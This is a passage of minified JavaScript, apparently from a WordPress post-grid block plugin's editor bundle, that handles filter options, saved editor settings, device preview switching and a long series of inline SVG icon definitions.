Order"},{id:"rand",name:"Random"},{id:"comment_count",name:"Number of Comments"}]};case"adv_sort":return{hasResolved:!0,records:u.map((e=>({id:e.value,name:e.label})))};default:return null}}(e,l),a=function(e,t){const l=new Map;return["order","order_by"].includes(e)||l.set("_all",{label:t}),l}(e,t);return null===o?["none",a]:o.hasResolved?o.hasResolved&&!o.records?["none",a]:o.hasResolved&&"ERROR"===o.status?["error",a]:("author"===e?o.records.forEach((e=>{if(e.roles&&e.roles.includes("author")){const t=e.name;a.set(String(e.id),{label:t})}})):"custom_tax"===e?o.records.forEach((e=>{a.set(String(e.slug),{label:e.labels.name})})):o.records.forEach((e=>{a.set(String(e.id),{label:e.name})})),["success",a]):["loading",a]}function T(e){return 0===e.length?[]:e.filter((e=>e.attributes.selectedLabel)).map((e=>({[e.clientId]:e.attributes.selectedLabel})))}function _(e){return e.toLowerCase().replace(/\b(\w)/g,(e=>e.toUpperCase()))}function C(e){const{updateBlockAttributes:t}=wp.data.dispatch("core/block-editor");t(e,{selectedValue:"_all",selectedLabel:""})}const E=e=>{let t=[];return e.forEach((e=>{t.push(e),e.innerBlocks&&e.innerBlocks.length>0&&(t=t.concat(E(e.innerBlocks)))})),t};function S(e){function t(e){const t=document.getElementById("ultp-sidebar-"+e);t?(t.classList.add("ultp-sidebar-highlight"),t.style.scrollMarginTop="51px",t.scrollIntoView({behavior:"smooth"}),setTimeout((function(){t?.classList.remove("ultp-sidebar-highlight")}),2e3)):console.warn("section not found: "+e)}e=e.replace(/ /g,"-").toLowerCase(),setTimeout((()=>{try{t(e)}catch{setTimeout((()=>t(e)),1500)}}),500)}function P(e,t){const{updateBlockAttributes:l}=wp.data.dispatch("core/block-editor");b(e).forEach((e=>{l(e.clientId,t)}))}function L(e){localStorage.setItem("ultp_selected_settings_section",e)}function I(e){localStorage.setItem("ultp_selected_toolbar",e)}function B(){"true"!==localStorage.getItem("ultp_settings_reset_disabled")&&(localStorage.removeItem("ultp_selected_settings_section"),localStorage.removeItem("ultp_selected_toolbar"),localStorage.removeItem("ultp_settings_save_state"),localStorage.removeItem("ultp_prev_sel_block"),localStorage.removeItem("ultp_settings_active_tab"))}function U(e,t){localStorage.setItem("ultp_settings_active_tab",e+"###"+t)}function M(e){if("true"===localStorage.getItem("ultp_settings_save_state")){const t=localStorage.getItem("ultp_settings_active_tab");if(t){const[l,o]=t.split("###");return l===e?o:void 0}}}function A(e,t){if("true"===localStorage.getItem("ultp_settings_save_state")){const l=localStorage.getItem("ultp_selected_settings_section");l&&e(l);const o=localStorage.getItem("ultp_selected_toolbar");o&&t(o),B()}}function H(e,t,l,o){let a=null;e&&e["post-grid-parent/postBlockClientId"];const i=g(l.clientId);t&&null===i&&(l.setAttributes({advFilterEnable:!1}),h(l.clientId));const n=y(l.clientId);o&&null===n&&(l.setAttributes({advPaginationEnable:!1}),w(l.clientId))}},54324:(e,t,l)=>{"use strict";l.d(t,{S:()=>r});var o=l(53049);const{useEffect:a}=wp.element,{getBlockAttributes:i,getBlockRootClientId:n}=wp.data.select("core/block-editor"),r=(e={})=>{const{blockId:t,clientId:l,currentPostId:r,setAttributes:s,changePostId:p,checkRef:c}=e;a((()=>{const e=l.substr(0,6),a=0!=c?i(n(l)):"";t?t&&t!=e&&(a?.hasOwnProperty("ref")||s({blockId:e})):s({blockId:e}),0!=p&&(0,o.qi)(s,a,r,l)}),[l])}},2376:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});const{useEffect:o,useState:a,useRef:i}=wp.element;function n(){const e=i(),[t,l]=a(!1);return o((()=>{const t=t=>{!e.current||e.current.contains(t.target)||((e,t)=>{let l=t.parentNode;for(;null!==l;){if(l===e)return!0;l=l.parentNode}return!1})(e.current,t.target)||l(!1)};return document.addEventListener("click",t,!0),()=>{document.removeEventListener("click",t,!0)}}),[]),{elementRef:e,isSelected:t,setIsSelected:l}}},59902:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});const{useSelect:o,useDispatch:a}=wp.data,{useEffect:i}=wp.element,n={Desktop:"lg",Tablet:"sm",Mobile:"xs",lg:"Desktop",sm:"Tablet",xs:"Mobile"},r=wp.data.select("core/edit-site")?"core/edit-site":"core/edit-post";function s(){if(document.querySelector(".widgets-php")||document.querySelector("body.wp-customizer"))return[localStorage.getItem("ultpDevice")||"lg",e=>{if(localStorage.getItem("ultpDevice")!=e){localStorage.setItem("ultpDevice",e);const t=wp.data?.select("core/block-editor")?.getSelectedBlock();wp.data?.dispatch("core/block-editor")?.clearSelectedBlock(),setTimeout((()=>{t?.clientId&&wp.data.dispatch("core/block-editor")?.selectBlock(t.clientId)}),100)}}];let e;const{clearSelectedBlock:t,selectBlock:l}=a("core/block-editor"),i=o((e=>e("core/block-editor").getSelectedBlock),[]),{setPreviewDevice:s}=a("core/editor");e=s;const{__experimentalSetPreviewDeviceType:p}=a(r);e||(e=p);const c=o((e=>{let t;const{getDeviceType:l}=e("core/editor");if(t=l,!t){const{__experimentalGetPreviewDeviceType:l}=e(r);t=l}return n[t()]}),[]);return[c,o=>{const a=i();(["Desktop","lg"].includes(o)||["Desktop","lg"].includes(c))&&c!==o&&a?.clientId&&!wp.data.select("core/edit-site")?(localStorage.setItem("ultp_settings_save_state","true"),localStorage.setItem("ultp_settings_reset_disabled","true"),t(),e(n[o]),localStorage.setItem("ultpDevice",o.length<3?c:n[o]),setTimeout((()=>{l(a.clientId),setTimeout((()=>{localStorage.removeItem("ultp_settings_reset_disabled")}),500)}),500)):e(n[o])}]}},88640:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(67294);const{useState:a,useRef:i,useEffect:n}=wp.element;function r({onClick:e,hideStyleButton:t}){const l=i(null),a=e=>{l.current&&!l.current.contains(e.target)&&t()};return n((()=>(document.addEventListener("click",a,!0),()=>{document.removeEventListener("click",a,!0)})),[]),(0,o.createElement)("span",{ref:l,onClick:e,className:"ultp-ux-style-btn dashicons dashicons-admin-customizer"})}function s(e){const[t,l]=a(!1);return{showStyleButton:()=>{l(!0)},StyleButton:t?(0,o.createElement)(r,{hideStyleButton:()=>{l(!1)},onClick:e}):null}}},87763:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(67294);const a={};a.left=(0,o.createElement)("svg",{width:24,height:24,xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M4 19.8h8.9v-1.5H4v1.5zm8.9-15.6H4v1.5h8.9V4.2zm-8.9 7v1.5h16v-1.5H4z"})),a.center=(0,o.createElement)("svg",{width:24,height:24,xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M16.4 4.2H7.6v1.5h8.9V4.2zM4 11.2v1.5h16v-1.5H4zm3.6 8.6h8.9v-1.5H7.6v1.5z"})),a.right=(0,o.createElement)("svg",{width:24,height:24,xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M11.1 19.8H20v-1.5h-8.9v1.5zm0-15.6v1.5H20V4.2h-8.9zM4 12.8h16v-1.5H4v1.5z"})),a.spacing=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:24,height:24,fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"#1E1E1E",strokeWidth:"1.5",d:"m10 8-3.3 3.3a1 1 0 0 0 0 1.4L10 16m4-8 3.3 3.3a1 1 0 0 1 0 1.4L14 16m-7.59-4H17.6M20 4v16M4 4v16"})),a.updateLink=(0,o.createElement)("svg",{style:{height:"20px",width:"20px"},xmlns:"http://www.w3.org/2000/svg",width:"20",height:"20",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fill:"#070707",fillRule:"evenodd",d:"M12.95 2.93a5.75 5.75 0 0 1 8.13 8.13v.01l-3 3a5.75 5.75 0 0 1-8.68-.62.75.75 0 0 1 1.2-.9 4.25 4.25 0 0 0 6.41.46l3-3a4.25 4.25 0 0 0-6.02-6l-1.71 1.7a.75.75 0 1 1-1.06-1.06l1.73-1.72Z",clipRule:"evenodd"}),(0,o.createElement)("path",{fill:"#070707",fillRule:"evenodd",d:"M7.99 8.6a5.75 5.75 0 0 1 6.61 1.95.75.75 0 1 1-1.2.9 4.25 4.25 0 0 0-6.41-.46l-3 3a4.25 4.25 0 0 0 6.01 6l1.71-1.7a.75.75 0 0 1 1.06 1.06l-1.72 1.72a5.75 5.75 0 0 1-8.13-8.13l.01-.01 3-3a5.75 5.75 0 0 1 2.06-1.32Z",clipRule:"evenodd"})),a.addSubmenu=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"16",height:"16",fill:"none",viewBox:"0 0 16 16"},(0,o.createElement)("g",{fill:"#070707",fillRule:"evenodd",clipPath:"url(#a)",clipRule:"evenodd"},(0,o.createElement)("path",{d:"M.17 2C.17.99.99.17 2 .17h12c1.01 0 1.83.82 1.83 1.83v1.33c0 1.02-.82 1.84-1.83 1.84H2A1.83 1.83 0 0 1 .17 3.33V2ZM2 1.17a.83.83 0 0 0-.83.83v1.33c0 .46.37.84.83.84h12c.46 0 .83-.38.83-.84V2a.83.83 0 0 0-.83-.83H2ZM5.5 8c0-1.01.82-1.83 1.83-1.83h5.34c1 0 1.83.82 1.83 1.83v.67c0 1-.82 1.83-1.83 1.83H7.33A1.83 1.83 0 0 1 5.5 8.67V8Zm1.83-.83A.83.83 0 0 0 6.5 8v.67c0 .46.37.83.83.83h5.34c.46 0 .83-.37.83-.83V8a.83.83 0 0 0-.83-.83H7.33ZM5.5 13.33c0-1.01.82-1.83 1.83-1.83h5.34c1 0 1.83.82 1.83 1.83V14c0 1.01-.82 1.83-1.83 1.83H7.33A1.83 1.83 0 0 1 5.5 14v-.67Zm1.83-.83a.83.83 0 0 0-.83.83V14c0 .46.37.83.83.83h5.34c.46 0 .83-.37.83-.83v-.67a.83.83 0 0 0-.83-.83H7.33Z"}),(0,o.createElement)("path",{d:"M2.17 13V4.67h1V13c0 .1.07.17.16.17H6.5v1H3.33c-.64 0-1.16-.53-1.16-1.17Z"}),(0,o.createElement)("path",{d:"M2.17 7.83H6.5v1H2.17v-1Z"})),(0,o.createElement)("defs",null,(0,o.createElement)("clipPath",{id:"a"},(0,o.createElement)("path",{fill:"#fff",d:"M0 0h16v16H0z"})))),a.textTab=(0,o.createElement)("span",{className:"ultp-tab-button"},(0,o.createElement)("svg",{width:24,height:24,viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M4 18V6C4 4.89543 4.89543 4 6 4H14.8639C15.3943 4 15.903 4.21071 16.2781 4.58579L19.4142 7.72191C19.7893 8.09698 20 8.60569 20 9.13612V18C20 19.1046 19.1046 20 18 20H6C4.89543 20 4 19.1046 4 18Z",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,o.createElement)("path",{d:"M8 15H16",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,o.createElement)("path",{d:"M8 12H16",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,o.createElement)("path",{d:"M8 9H14",stroke:"#1E1E1E",strokeWidth:"1.5"})),(0,o.createElement)("span",null,"Text")),a.style=(0,o.createElement)("span",{className:"ultp-tab-button"},(0,o.createElement)("svg",{width:24,height:24,viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M19.9753 10C20.1346 11.5 19.6219 12.5 18.6219 13.5C16.6219 15.5 12.5451 14.2091 11.73 15C10.9148 15.791 11.73 16.8594 12.7008 17.4873C14.2468 18.4873 13.7314 19.9873 12.2453 20.0001C7.69166 20.0391 4 16 4 12C4 7.58197 7.69149 4 12.2453 4C16.7991 4 19.7128 7.52818 19.9753 10Z",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,o.createElement)("circle",{cx:"16.25",cy:"9.25",r:"1.25",fill:"#1E1E1E"}),(0,o.createElement)("path",{d:"M14 7C14 7.69036 13.4404 8.25 12.75 8.25C12.0596 8.25 11.5 7.69036 11.5 7C11.5 6.30964 12.0596 5.75 12.75 5.75C13.4404 5.75 14 6.30964 14 7Z",fill:"#1E1E1E"}),(0,o.createElement)("path",{d:"M10 8.25C10 8.94036 9.44036 9.5 8.75 9.5C8.05964 9.5 7.5 8.94036 7.5 8.25C7.5 7.55964 8.05964 7 8.75 7C9.44036 7 10 7.55964 10 8.25Z",fill:"#1E1E1E"}),(0,o.createElement)("path",{d:"M8.5 12C8.5 12.6904 7.94036 13.25 7.25 13.25C6.55964 13.25 6 12.6904 6 12C6 11.3096 6.55964 10.75 7.25 10.75C7.94036 10.75 8.5 11.3096 8.5 12Z",fill:"#1E1E1E"})),(0,o.createElement)("span",null,"Style")),a.settings3=(0,o.createElement)("span",{className:"ultp-tab-button"},(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M20.0733 7.98829L19.5027 6.9982C19.02 6.16044 17.9503 5.87144 17.1114 6.35213C16.7121 6.58737 16.2356 6.65411 15.787 6.53764C15.3384 6.42116 14.9546 6.13103 14.7201 5.73123C14.5693 5.47711 14.4882 5.18767 14.4852 4.89218C14.4988 4.41843 14.3201 3.95934 13.9897 3.61951C13.6593 3.27967 13.2055 3.08802 12.7316 3.08821H11.5821C11.1177 3.08821 10.6725 3.27323 10.345 3.60234C10.0175 3.93145 9.83459 4.37752 9.83682 4.84183C9.82306 5.80049 9.04195 6.57039 8.08319 6.57029C7.7877 6.56722 7.49826 6.48617 7.24414 6.33535C6.40523 5.85465 5.33553 6.14366 4.85284 6.98142L4.24033 7.98829C3.75822 8.825 4.04329 9.89403 4.87801 10.3796C5.42059 10.6928 5.75483 11.2718 5.75483 11.8983C5.75483 12.5248 5.42059 13.1037 4.87801 13.417C4.04435 13.8993 3.75897 14.9657 4.24033 15.7999L4.81927 16.7984C5.04543 17.2064 5.42489 17.5076 5.87369 17.6351C6.32248 17.7627 6.8036 17.7061 7.21058 17.478C7.61067 17.2445 8.08743 17.1806 8.5349 17.3003C8.98238 17.4201 9.36347 17.7136 9.59349 18.1157C9.74431 18.3698 9.82536 18.6592 9.82843 18.9547C9.82843 19.9232 10.6136 20.7083 11.5821 20.7083H12.7316C13.6968 20.7083 14.4806 19.9283 14.4852 18.9631C14.4829 18.4973 14.667 18.05 14.9963 17.7206C15.3257 17.3913 15.773 17.2073 16.2388 17.2095C16.5336 17.2174 16.8218 17.2981 17.0779 17.4444C17.9146 17.9265 18.9836 17.6415 19.4692 16.8067L20.0733 15.7999C20.3071 15.3985 20.3713 14.9205 20.2516 14.4717C20.1319 14.0228 19.8382 13.6402 19.4356 13.4086C19.033 13.1769 18.7393 12.7943 18.6196 12.3455C18.4999 11.8967 18.5641 11.4186 18.7979 11.0173C18.95 10.7518 19.1701 10.5317 19.4356 10.3796C20.2653 9.89429 20.5497 8.83151 20.0733 7.99668V7.98829Z",stroke:"#1E1E1E",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M12.1606 14.3147C13.4952 14.3147 14.5771 13.2329 14.5771 11.8983C14.5771 10.5637 13.4952 9.4818 12.1606 9.4818C10.826 9.4818 9.74414 10.5637 9.74414 11.8983C9.74414 13.2329 10.826 14.3147 12.1606 14.3147Z",stroke:"#1E1E1E",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),(0,o.createElement)("span",null,"Settings")),a.add=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:22,height:24,viewBox:"0 0 22 24",fill:"none"},(0,o.createElement)("g",{clipPath:"url(#clip0_16_9344)"},(0,o.createElement)("path",{d:"M15.7131 0.87241C16.6876 0.87241 17.4896 1.67503 17.4896 2.66957V17.6401C17.4896 18.626 16.6962 19.4373 15.7131 19.4373H2.63896C1.66445 19.4373 0.862407 18.6347 0.862407 17.6401V2.66957C0.862407 1.68375 1.65582 0.87241 2.63896 0.87241H15.7131ZM15.7131 0H2.63896C1.1815 0 0 1.1952 0 2.66957V17.6401C0 19.1145 1.1815 20.3097 2.63896 20.3097H15.7131C17.1705 20.3097 18.352 19.1145 18.352 17.6401V2.66957C18.352 1.1952 17.1705 0 15.7131 0Z",fill:"black"}),(0,o.createElement)("path",{d:"M19.2921 10.2683H11.1337C9.63817 10.2683 8.42578 11.4948 8.42578 13.0077V21.2607C8.42578 22.7736 9.63817 24 11.1337 24H19.2921C20.7877 24 22.0001 22.7736 22.0001 21.2607V13.0077C22.0001 11.4948 20.7877 10.2683 19.2921 10.2683Z",fill:"black"}),(0,o.createElement)("path",{d:"M15.7047 13.9934H14.7129V20.2835H15.7047V13.9934Z",fill:"white"}),(0,o.createElement)("path",{d:"M18.3264 16.6282H12.1084V17.6314H18.3264V16.6282Z",fill:"white"})),(0,o.createElement)("defs",null,(0,o.createElement)("clipPath",{id:"clip0_16_9344"},(0,o.createElement)("rect",{width:22,height:24,fill:"white"})))),a.setting=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",role:"img","aria-hidden":"true",focusable:"false"},(0,o.createElement)("path",{d:"M14.5 13.8c-1.1 0-2.1.7-2.4 1.8H4V17h8.1c.3 1 1.3 1.8 2.4 1.8s2.1-.7 2.4-1.8H20v-1.5h-3.1c-.3-1-1.3-1.7-2.4-1.7zM11.9 7c-.3-1-1.3-1.8-2.4-1.8S7.4 6 7.1 7H4v1.5h3.1c.3 1 1.3 1.8 2.4 1.8s2.1-.7 2.4-1.8H20V7h-8.1z"})),a.styleIcon=(0,o.createElement)("svg",{width:24,height:24,viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg",style:{fill:"white"}},(0,o.createElement)("path",{d:"M19.9753 10C20.1346 11.5 19.6219 12.5 18.6219 13.5C16.6219 15.5 12.5451 14.2091 11.73 15C10.9148 15.791 11.73 16.8594 12.7008 17.4873C14.2468 18.4873 13.7314 19.9873 12.2453 20.0001C7.69166 20.0391 4 16 4 12C4 7.58197 7.69149 4 12.2453 4C16.7991 4 19.7128 7.52818 19.9753 10Z",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,o.createElement)("circle",{cx:"16.25",cy:"9.25",r:"1.25",fill:"#1E1E1E"}),(0,o.createElement)("path",{d:"M14 7C14 7.69036 13.4404 8.25 12.75 8.25C12.0596 8.25 11.5 7.69036 11.5 7C11.5 6.30964 12.0596 5.75 12.75 5.75C13.4404 5.75 14 6.30964 14 7Z",fill:"#1E1E1E"}),(0,o.createElement)("path",{d:"M10 8.25C10 8.94036 9.44036 9.5 8.75 9.5C8.05964 9.5 7.5 8.94036 7.5 8.25C7.5 7.55964 8.05964 7 8.75 7C9.44036 7 10 7.55964 10 8.25Z",fill:"#1E1E1E"}),(0,o.createElement)("path",{d:"M8.5 12C8.5 12.6904 7.94036 13.25 7.25 13.25C6.55964 13.25 6 12.6904 6 12C6 11.3096 6.55964 10.75 7.25 10.75C7.94036 10.75 8.5 11.3096 8.5 12Z",fill:"#1E1E1E"})),a.chatgpt=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",style:{fill:"#10a37f"},width:"25",height:"25.06",viewBox:"0 0 25 25.06"},(0,o.createElement)("path",{"data-name":"Path 146",d:"M24.795 12.941a6.153 6.153 0 0 0-1.519-2.7A6.07 6.07 0 0 0 22.8 5.1a6.327 6.327 0 0 0-6.88-2.917A6.28 6.28 0 0 0 5.139 4.471 6.223 6.223 0 0 0 .846 7.45a6.137 6.137 0 0 0 .862 7.358 6.07 6.07 0 0 0 .479 5.138 6.281 6.281 0 0 0 6.88 2.91A6.278 6.278 0 0 0 19.851 20.6a6.23 6.23 0 0 0 4.293-2.979 6.092 6.092 0 0 0 .651-4.682m-4.888 5.947v-6.22a.639.639 0 0 0-.285-.621L13.913 8.82l2.061-1.17L20.8 10.4a4.636 4.636 0 0 1 2.209 2.854 4.566 4.566 0 0 1-.475 3.517 4.662 4.662 0 0 1-2.185 1.943c-.146.063-.3.122-.446.178M5.083 6.178v6.2a.624.624 0 0 0 .279.622l5.708 3.226L9.011 17.4l-4.852-2.752a4.639 4.639 0 0 1-2.21-2.854 4.562 4.562 0 0 1 .473-3.514 4.687 4.687 0 0 1 1.784-1.736 4.551 4.551 0 0 1 .877-.367m11.268.023a.714.714 0 0 0-.707 0L9.855 9.5V7.1l4.92-2.748a4.79 4.79 0 0 1 6.485 1.721 4.574 4.574 0 0 1 .616 2.648c-.014.19-.039.393-.07.58zm-3.859 3.47 2.637 1.5v2.756l-2.637 1.457-2.631-1.5v-2.741zM8.8 6.067a.684.684 0 0 0-.3.624v6.4l-2.082-1.137V6.587a1.017 1.017 0 0 0 0-.112 4.75 4.75 0 0 1 7.364-3.911 6.33 6.33 0 0 1 .547.412zm-5.614 9.692 5.448 3.1a.713.713 0 0 0 .707 0l5.8-3.294v2.4l-4.927 2.729a4.79 4.79 0 0 1-6.485-1.713 4.573 4.573 0 0 1-.588-2.917c.013-.1.031-.2.05-.3m13 3.226a.647.647 0 0 0 .3-.627v-6.4l2.07 1.137v5.367a.637.637 0 0 0 0 .112 4.75 4.75 0 0 1-7.441 3.851 7.315 7.315 0 0 1-.467-.356z",transform:"translate(0 .001)"})),a.fs_comment=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"50",height:"50.003",viewBox:"0 0 50 50.003"},(0,o.createElement)("path",{id:"Path_2150","data-name":"Path 2150",d:"M25,11.6c-21.64,0-25,2.79-25,20.8C0,46.131,1.963,51.017,12.476,52.567V61.6l10.646-8.4c.611.005,1.235.008,1.878.008,21.65,0,25-2.8,25-20.81S46.65,11.6,25,11.6m0,18.04a2.765,2.765,0,1,1-2.76,2.76A2.768,2.768,0,0,1,25,29.642m-9.53,0a2.765,2.765,0,1,1-2.76,2.76,2.768,2.768,0,0,1,2.76-2.76m19.06,5.53A2.765,2.765,0,1,1,37.3,32.4a2.768,2.768,0,0,1-2.77,2.77",transform:"translate(0 -11.602)",fill:"#037FFF"})),a.fs_comment_selected=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"70",height:"70",viewBox:"0 0 70 70"},(0,o.createElement)("g",{id:"Group_4357","data-name":"Group 4357",transform:"translate(-221.11 2002)"},(0,o.createElement)("path",{id:"Path_2154","data-name":"Path 2154",d:"M172.35,30.8a2.765,2.765,0,1,1-2.77-2.76,2.77,2.77,0,0,1,2.77,2.76",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,o.createElement)("path",{id:"Path_2155","data-name":"Path 2155",d:"M181.88,30.8a2.765,2.765,0,1,1-2.77-2.76,2.77,2.77,0,0,1,2.77,2.76",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,o.createElement)("path",{id:"Path_2156","data-name":"Path 2156",d:"M191.41,30.8a2.765,2.765,0,1,1-2.77-2.76,2.77,2.77,0,0,1,2.77,2.76",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,o.createElement)("path",{id:"Path_2157","data-name":"Path 2157",d:"M204.65,0H153.58a9.468,9.468,0,0,0-9.47,9.46V60.54A9.468,9.468,0,0,0,153.58,70h51.07a9.46,9.46,0,0,0,9.46-9.46V9.46A9.46,9.46,0,0,0,204.65,0M179.11,51.61c-.64,0-1.26,0-1.87-.01L166.59,60V50.96c-10.51-1.55-12.48-6.43-12.48-20.16,0-18.01,3.36-20.8,25-20.8s25,2.79,25,20.8-3.35,20.81-25,20.81",transform:"translate(77 -2002)",fill:"#037FFF"}))),a.fs_suggestion=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"50.001",height:"49.997",viewBox:"0 0 50.001 49.997"},(0,o.createElement)("g",{id:"Group_4358","data-name":"Group 4358",transform:"translate(-137.503 1994.592)"},(0,o.createElement)("path",{id:"Path_2151","data-name":"Path 2151",d:"M104.722,20.306H89.545V24.08a4.274,4.274,0,0,1-4.267,4.267H76.261a4.218,4.218,0,0,1-1.812-.424,4.272,4.272,0,0,1-4.107,3.166h-6.1V51.623A5.773,5.773,0,0,0,70.021,57.4h34.7a5.78,5.78,0,0,0,5.782-5.782V26.1a5.789,5.789,0,0,0-5.782-5.793M90.13,47.791H76.835a1.692,1.692,0,0,1,0-3.384H90.13a1.692,1.692,0,0,1,0,3.384m7.778-7.915H76.835a1.692,1.692,0,0,1,0-3.384H97.908a1.692,1.692,0,0,1,0,3.384",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,o.createElement)("path",{id:"Path_2152","data-name":"Path 2152",d:"M86.1,24.077V15.065a.827.827,0,0,0-.827-.827H80.619a.827.827,0,0,1-.742-1.193l2.2-4.443a.827.827,0,0,0-.741-1.194h-2a.827.827,0,0,0-.741.461l-3.062,6.2a.83.83,0,0,0-.086.366v9.646a.827.827,0,0,0,.827.827h9.012a.827.827,0,0,0,.827-.827",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,o.createElement)("path",{id:"Path_2153","data-name":"Path 2153",d:"M71.169,26.82V17.808a.827.827,0,0,0-.827-.827H65.684a.827.827,0,0,1-.742-1.193l2.2-4.443a.827.827,0,0,0-.741-1.194H64.392a.827.827,0,0,0-.741.461l-3.062,6.2a.83.83,0,0,0-.086.366V26.82a.827.827,0,0,0,.827.827h9.012a.827.827,0,0,0,.827-.827",transform:"translate(77 -2002)",fill:"#037FFF"}))),a.fs_suggestion_selected=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"70",height:"70",viewBox:"0 0 70 70"},(0,o.createElement)("path",{id:"Path_2158","data-name":"Path 2158",d:"M329.38,0H278.3a9.46,9.46,0,0,0-9.46,9.46V60.54A9.46,9.46,0,0,0,278.3,70h51.08a9.466,9.466,0,0,0,9.46-9.46V9.46A9.466,9.466,0,0,0,329.38,0M293.77,17.03a.779.779,0,0,1,.09-.37l3.06-6.2a.834.834,0,0,1,.74-.46h2.01a.833.833,0,0,1,.74,1.2l-2.2,4.44a.825.825,0,0,0,.74,1.19h4.66a.828.828,0,0,1,.83.83v9.01a.828.828,0,0,1-.83.83H294.6a.828.828,0,0,1-.83-.83ZM278.84,29.41V19.77a.946.946,0,0,1,.08-.37l3.06-6.19a.82.82,0,0,1,.75-.46h2a.825.825,0,0,1,.74,1.19l-2.19,4.44a.826.826,0,0,0,.74,1.2h4.66a.824.824,0,0,1,.82.82v9.01a.826.826,0,0,1-.82.83h-9.02a.826.826,0,0,1-.82-.83m50,24.81A5.783,5.783,0,0,1,323.06,60H288.35a5.77,5.77,0,0,1-5.78-5.78V33.68h6.11a4.26,4.26,0,0,0,4.1-3.16,4.257,4.257,0,0,0,1.81.42h9.02a4.274,4.274,0,0,0,4.27-4.27V22.9h15.18a5.791,5.791,0,0,1,5.78,5.79Zm-12.6-15.13H295.17a1.69,1.69,0,1,0,0,3.38h21.07a1.69,1.69,0,1,0,0-3.38M308.46,47H295.17a1.7,1.7,0,0,0,0,3.39h13.29a1.7,1.7,0,0,0,0-3.39",transform:"translate(-268.84)",fill:"#037FFF"})),a.grid_col1=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"22",height:"22",viewBox:"0 0 22 22",fill:"currentColor"},(0,o.createElement)("g",{transform:"translate(-770 -381)"},(0,o.createElement)("rect",{width:"10",height:"10",transform:"translate(770 381)"}),(0,o.createElement)("rect",{width:"10",height:"10",transform:"translate(770 393)"}),(0,o.createElement)("rect",{width:"10",height:"10",transform:"translate(782 381)"}),(0,o.createElement)("rect",{width:"10",height:"10",transform:"translate(782 393)"}))),a.grid_col2=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"22",height:"22",viewBox:"0 0 22 22",fill:"currentColor"},(0,o.createElement)("g",{transform:"translate(-858 -381)"},(0,o.createElement)("rect",{width:"6",height:"6",transform:"translate(858 381)"}),(0,o.createElement)("rect",{width:"6",height:"6",transform:"translate(858 389)"}),(0,o.createElement)("rect",{width:"6",height:"6",transform:"translate(858 397)"}),(0,o.createElement)("rect",{width:"6",height:"6",transform:"translate(866 381)"}),(0,o.createElement)("rect",{width:"6",height:"6",transform:"translate(866 389)"}),(0,o.createElement)("rect",{width:"6",height:"6",transform:"translate(866 397)"}),(0,o.createElement)("rect",{width:"6",height:"6",transform:"translate(874 381)"}),(0,o.createElement)("rect",{width:"6",height:"6",transform:"translate(874 389)"}),(0,o.createElement)("rect",{width:"6",height:"6",transform:"translate(874 397)"}))),a.grid_col3=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"22",height:"22",viewBox:"0 0 22 22"},(0,o.createElement)("g",{transform:"translate(-909 -381)"},(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(909 381)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(909 387)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(909 393)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(909 399)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(915 381)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(915 387)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(915 393)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(915 399)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(921 381)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(921 387)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(921 393)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(921 399)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(927 